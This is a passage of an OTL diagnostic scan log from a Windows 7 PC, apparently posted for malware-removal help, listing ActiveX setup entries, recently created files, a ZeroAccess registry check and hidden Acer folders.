ActiveX:[b]64bit:[/b] {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX:[b]64bit:[/b] {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX:[b]64bit:[/b] {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX:[b]64bit:[/b] {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX:[b]64bit:[/b] {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX:[b]64bit:[/b] {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX:[b]64bit:[/b] {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX:[b]64bit:[/b] {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX:[b]64bit:[/b] {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX:[b]64bit:[/b] {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX:[b]64bit:[/b] {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX:[b]64bit:[/b] {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\System32\ie4uinit.exe -BaseSettings
ActiveX:[b]64bit:[/b] {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\system32\Rundll32.exe C:\Windows\system32\mscories.dll,Install
ActiveX:[b]64bit:[/b] {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\45.0.2454.85\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
ActiveX:[b]64bit:[/b] {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX:[b]64bit:[/b] {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX:[b]64bit:[/b] {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX:[b]64bit:[/b] {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX:[b]64bit:[/b] {FEBEF00C-046D-438D-8A88-BF94A6C9E703} - .NET Framework
ActiveX:[b]64bit:[/b] >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX:[b]64bit:[/b] >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\System32\ie4uinit.exe -UserIconConfig
ActiveX:[b]64bit:[/b] >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
ActiveX: {1AD147D0-BE0E-3D6C-AC11-64F6DC4163F1} - .NET Framework
ActiveX: {22d6f312-b0f6-11d0-94ab-0080c74c7e95} - Microsoft Windows Media Player 12.0
ActiveX: {23A20C3C-2ADD-4A80-AFB4-C146F8847D79} - .NET Framework
ActiveX: {26784146-6E05-3FF9-9335-786C7C0FB5BE} - .NET Framework
ActiveX: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - %SystemRoot%\system32\regsvr32.exe /s /n /i:/UserInstall %SystemRoot%\system32\themeui.dll
ActiveX: {3af36230-a269-11d1-b5bf-0000f8051515} - Offline Browsing Pack
ActiveX: {44BBA840-CC51-11CF-AAFA-00AA00B6015C} - "%ProgramFiles(x86)%\Windows Mail\WinMail.exe" OCInstallUserConfigOE
ActiveX: {44BBA855-CC51-11CF-AAFA-00AA00B6015F} - DirectDrawEx
ActiveX: {45ea75a0-a269-11d1-b5bf-0000f8051515} - Internet Explorer Help
ActiveX: {4f645220-306d-11d2-995d-00c04f98bbc9} - Microsoft Windows Script 5.6
ActiveX: {5fd399c0-a70a-11d1-9948-00c04f98bbc9} - Internet Explorer Setup Tools
ActiveX: {630b1da0-b465-11d1-9948-00c04f98bbc9} - Browsing Enhancements
ActiveX: {6BF52A52-394A-11d3-B153-00C04F79FAA6} - Microsoft Windows Media Player
ActiveX: {6fab99d0-bab8-11d1-994a-00c04f98bbc9} - MSN Site Access
ActiveX: {7790769C-0471-11d2-AF11-00C04FA35D02} - Address Book 7
ActiveX: {7C028AF8-F614-47B3-82DA-BA94E41B1089} - .NET Framework
ActiveX: {7DEBE4EB-6B40-3766-BB35-5CBBC385DA37} - .NET Framework
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4340} - regsvr32.exe /s /n /i:U shell32.dll
ActiveX: {89820200-ECBD-11cf-8B85-00AA005B4383} - C:\Windows\SysWOW64\ie4uinit.exe -BaseSettings
ActiveX: {89B4C1CD-B018-4511-B0A1-5476DBF70820} - C:\Windows\SysWOW64\Rundll32.exe C:\Windows\SysWOW64\mscories.dll,Install
ActiveX: {9381D8F2-0288-11D0-9501-00AA00B911A5} - Dynamic HTML Data Binding
ActiveX: {C9E9A340-D1F1-11D0-821E-444553540600} - Internet Explorer Core Fonts
ActiveX: {de5aed00-a4bf-11d1-9948-00c04f98bbc9} - HTML Help
ActiveX: {E92B03AB-B707-11d2-9CBD-0000F87A369E} - Active Directory Service Interface
ActiveX: >{22d6f312-b0f6-11d0-94ab-0080c74c7e95} - %SystemRoot%\system32\unregmp2.exe /ShowWMP
ActiveX: >{26923b43-4d38-484f-9b9e-de460746276c} - C:\Windows\SysWOW64\ie4uinit.exe -UserIconConfig
ActiveX: >{60B49E34-C7CC-11D0-8953-00A0C90347FF} - "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\iedkcs32.dll",BrandIEActiveSetup SIGNUP

CREATERESTOREPOINT
Restore point Set: OTL Restore Point

[color=#E56717]========== Files/Folders - Created Within 30 Days ==========[/color]

[2015/09/12 10:35:26 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/11 09:30:58 | 001,800,104 | ---- | C] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 16:11:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Malwarebytes
[2015/09/10 16:11:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes
[2015/09/10 01:22:17 | 000,000,000 | ---D | C] -- C:\Windows\SoftwareDistribution
[2015/09/09 14:52:24 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome アプリ
[2015/09/09 08:39:07 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
[2015/09/09 08:38:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Google
[2015/09/09 08:15:35 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\chorome
[2015/09/09 06:13:13 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\windows_update_fix
[2015/09/08 00:16:43 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\hjt・ccログ
[2015/09/07 23:41:07 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Geek Uninstaller
[2015/09/07 23:40:56 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\geek
[2015/09/07 23:23:58 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2015/09/07 23:23:57 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2015/09/07 23:14:58 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox
[2015/09/07 23:10:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Java
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Sun
[2015/09/07 23:10:14 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\.oracle_jre_usage
[2015/09/07 15:01:16 | 000,000,000 | ---D | C] -- C:\7b8eb74e5d1154427c6e2dbc
[2015/09/07 14:46:03 | 000,000,000 | ---D | C] -- C:\Windows\CheckSur
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Windows Live Writer
[2015/09/06 16:26:49 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Local\Windows Live Writer
[2015/09/06 15:56:49 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
[2015/09/06 15:56:39 | 000,000,000 | ---D | C] -- C:\Program Files\CCleaner
[2015/09/06 15:53:36 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Super PC Cleaner
[2015/09/04 12:25:28 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
[2015/09/01 11:50:34 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Desktop\TS
[2015/08/30 09:53:44 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SeekerFunc
[2015/08/24 19:20:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SystemForce
[2015/08/24 15:09:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2015/08/24 15:08:32 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2015/08/24 15:08:30 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2015/08/24 12:37:26 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\TaiG
[2015/08/18 13:56:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Microsoft OneDrive
[2015/08/18 13:56:16 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\OneDrive
[2015/08/18 13:55:52 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft OneDrive
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\AppData\Roaming\BANDISOFT
[2015/08/18 04:48:00 | 000,000,000 | ---D | C] -- C:\Users\【ユーザー名】\Documents\Bandicam

[color=#E56717]========== Files - Modified Within 30 Days ==========[/color]

[2015/09/12 16:48:00 | 000,000,690 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/12 16:06:00 | 000,000,626 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2015/09/12 16:02:53 | 000,000,696 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000UA.job
[2015/09/12 15:48:00 | 000,000,686 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/09/12 10:35:35 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\【ユーザー名】\Desktop\OTL.exe
[2015/09/12 00:02:08 | 000,000,644 | ---- | M] () -- C:\Windows\tasks\DropboxUpdateTaskUserS-1-5-21-2268393351-900118556-74167924-1000Core.job
[2015/09/11 10:01:17 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2015/09/11 10:01:17 | 000,024,400 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2015/09/11 09:52:34 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/09/11 09:52:30 | 3094,102,016 | -HS- | M] () -- C:\hiberfil.sys
[2015/09/11 09:31:03 | 001,800,104 | ---- | M] (Malwarebytes Corporation) -- C:\Users\【ユーザー名】\Desktop\JRT.exe
[2015/09/10 01:15:12 | 000,302,011 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:43:59 | 000,002,265 | ---- | M] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 23:40:11 | 000,263,472 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2015/09/07 23:30:54 | 000,001,066 | ---- | M] () -- C:\Users\Public\Desktop\VLC media player.lnk
[2015/09/07 23:23:58 | 000,002,681 | ---- | M] () -- C:\Users\Public\Desktop\Skype.lnk
[2015/09/07 23:09:42 | 000,097,888 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2015/09/07 16:23:07 | 564,744,309 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:21 | 002,582,815 | ---- | M] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | M] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/04 12:25:44 | 000,001,139 | ---- | M] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
[2015/08/24 15:09:30 | 000,001,787 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk

[color=#E56717]========== Files Created - No Company Name ==========[/color]

[2015/09/10 01:15:05 | 000,302,011 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\WindowsUpdateDiagnostic.diagcab
[2015/09/09 15:13:35 | 000,002,606 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\グランブルーファンタジー[ChromeApps版].lnk
[2015/09/09 08:39:07 | 000,002,265 | ---- | C] () -- C:\Users\【ユーザー名】\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2015/09/09 08:39:07 | 000,002,241 | ---- | C] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2015/09/07 16:13:27 | 564,744,309 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\Windows6.1-KB947821-v34-x64.msu
[2015/09/07 13:31:07 | 002,582,815 | ---- | C] () -- C:\Users\【ユーザー名】\Desktop\geek.zip
[2015/09/06 15:56:49 | 000,000,826 | ---- | C] () -- C:\Users\Public\Desktop\CCleaner.lnk
[2015/09/03 15:34:50 | 000,000,690 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2015/09/03 15:34:50 | 000,000,686 | ---- | C] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2015/08/24 15:09:30 | 000,001,787 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2015/08/18 13:56:19 | 000,002,094 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
[2015/05/18 17:32:28 | 000,000,000 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Temp.dat
[2015/05/06 07:26:47 | 000,000,079 | ---- | C] () -- C:\Program Files (x86)\prefs.js
[2014/12/13 21:29:15 | 000,007,605 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\Resmon.ResmonCfg
[2014/08/08 10:28:32 | 000,226,680 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2014/08/08 10:28:30 | 000,076,152 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrA.exe
[2014/06/07 02:39:33 | 000,001,525 | ---- | C] () -- C:\Users\【ユーザー名】\AppData\Local\recently-used.xbel
[2014/05/23 00:34:21 | 000,000,347 | ---- | C] () -- C:\Users\【ユーザー名】\コンピューター - ショートカット.lnk
[2014/05/11 21:45:24 | 000,002,549 | ---- | C] () -- C:\Windows\wininit.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2009/07/14 13:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 14:22:33 | 014,177,280 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 14:26:18 | 012,875,264 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 10:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/21 12:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 10:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]
[2013/08/08 09:40:21 | 000,000,000 | -H-D | M] -- C:\book
[2013/08/08 09:37:05 | 000,000,000 | -H-D | M] -- C:\Intel
[2014/04/01 21:30:57 | 000,000,000 | -H-D | M] -- C:\OEM
[2015/09/10 16:29:33 | 000,000,000 | -H-D | M] -- C:\ProgramData
[2014/04/02 15:30:11 | 000,000,000 | -H-D | M] -- C:\OEM\Registration
[2014/04/02 21:26:28 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\InstallShield Installation Information
[2013/08/08 09:47:02 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Temp
[2012/06/20 12:12:10 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\OOBEOffer\res\ThirdParty\Norton
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer
[2012/06/20 11:59:19 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Languages
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Pictures
[2012/06/20 11:59:20 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Registration\Acer\Settings
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Common
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\120
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\144
[2012/06/20 12:05:47 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Acer\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\eSobi\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item100\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item101\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item107\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item108\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item109\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item110\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item131\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item135\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item138\96
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\120
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\144
[2012/06/20 12:05:45 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item142\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item162\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item163\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item170\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item171\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item180\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item181\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item190\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item191\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item21\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item22\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item30\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item31\96
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\120
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\144
[2012/06/20 12:05:46 | 000,000,000 | -H-D | M] -- C:\Program Files (x86)\Acer\Welcome Center\Content\item32\96
